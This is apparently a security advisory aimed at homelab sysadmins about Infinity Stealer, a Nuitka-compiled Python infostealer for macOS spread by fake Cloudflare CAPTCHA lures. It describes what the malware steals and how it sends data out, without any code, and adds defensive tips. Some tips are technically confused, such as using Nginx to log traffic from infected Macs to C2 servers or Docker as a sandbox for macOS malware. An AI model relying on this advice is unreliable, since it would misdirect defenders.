A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using Nuitka, an open-source compiler that converts Python code into C and then compiles it natively. This approach makes the resulting binary more resistant to static analysis compared to traditional methods like PyInstaller. The attack uses the ClickFix technique, which involves presenting a fake CAPTCHA mimicking Cloudflare’s human verification check to trick users into executing malicious code. The malware, written in Python 3.11 and compiled with Nuitka, can steal credentials from browsers, Keychain entries, cryptocurrency wallets, and plaintext secrets such as .env files. All stolen data is exfiltrated via HTTP POST requests to the C2 server, and threat actors are notified through Telegram once the operation completes.
For sysadmins running homelab stacks involving Proxmox version 7.x, Docker (e.g., Docker Engine 20.10), Linux distributions like Ubuntu 20.04 LTS or Fedora 36, and web servers like Nginx (version 1.21.5), the Infinity Stealer malware poses a real threat to macOS systems used in these environments. The use of ClickFix lures combined with Python-based payloads can infiltrate even well-secured labs if sysadmins or users inadvertently execute malicious commands from unverified sources. For instance, an unsuspecting sysadmin might paste a base64-obfuscated curl command into the Terminal, leading to the deployment of the malware and potential data exfiltration.
- Infinity Stealer utilizes Python 3.11 compiled with Nuitka version 0.6.x or higher to create a native binary that bypasses common static analysis tools. This makes detection more challenging for traditional antivirus software, necessitating advanced security measures such as behavioral monitoring and heuristic-based detections.
- The malware leverages the ClickFix technique by posing as a human verification step from Cloudflare, tricking users into executing malicious code. Sysadmins should educate their teams to never paste unverified commands into Terminal, especially those that appear suspicious or come from unknown sources.
- Infinity Stealer performs anti-analysis checks to avoid detection in virtualized/sandboxed environments. This behavior suggests it aims to evade common testing methodologies used by cybersecurity researchers and automated analysis systems. Sysadmins should ensure their homelab setups include robust sandboxing technologies like Docker (version 20.10) or Proxmox version 7.x.
- The malware steals credentials from Chromium-based browsers, Firefox, and macOS Keychain entries, posing a significant risk to users' personal and professional data security. Sysadmins managing homelabs should enforce strong password policies and use multi-factor authentication for critical services.
- Data exfiltration occurs via HTTP POST requests to the C2 server, highlighting the importance of monitoring network traffic for unusual patterns indicative of malware activity. Nginx configurations could be adjusted to log such activities more effectively by modifying the `http` block in `/etc/nginx/nginx.conf`.
The Infinity Stealer has minimal direct impact on common homelab stacks like Proxmox (version 7.x), Docker (20.10), Linux distributions, and Nginx (1.21.5) as it targets macOS systems specifically. However, these stacks could be indirectly affected if a compromised macOS system within the network is used to launch further attacks on homelab components.
- Educate all users about the risks of pasting unverified commands into Terminal by distributing an internal security guideline document and conducting regular training sessions.
- Implement YARA rules tailored for detecting Nuitka-compiled binaries in your environment. Add these rules to your endpoint detection and response (EDR) system, if available, or use tools like `yara` to scan files manually.
- Configure network monitoring to log HTTP POST requests to known C2 servers by adjusting the `http` block settings in `/etc/nginx/nginx.conf`, including setting up logging for suspicious traffic patterns.